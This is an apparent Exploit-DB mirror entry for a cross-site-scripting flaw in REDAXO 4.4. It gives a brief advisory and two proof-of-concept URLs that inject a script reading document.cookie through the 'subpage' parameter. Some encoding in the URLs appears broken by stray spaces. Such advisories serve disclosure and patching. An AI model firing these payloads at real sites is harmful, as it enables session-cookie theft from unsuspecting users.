exploit-db-mirror/platforms/php/webapps/37539.txt
Offensive Security e8f22fe4b6 DB: 2015-07-11
26 new exploits
2015-07-11 05:03:28 +00:00

11 lines
No EOL
733 B
Text
Executable file

source: http://www.securityfocus.com/bid/54670/info
REDAXO is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
REDAXO 4.4 is vulnerable; prior versions may also be affected.
http://www.example.com/redaxo/index.php?page=user&subpage=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
http://www.example.com/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E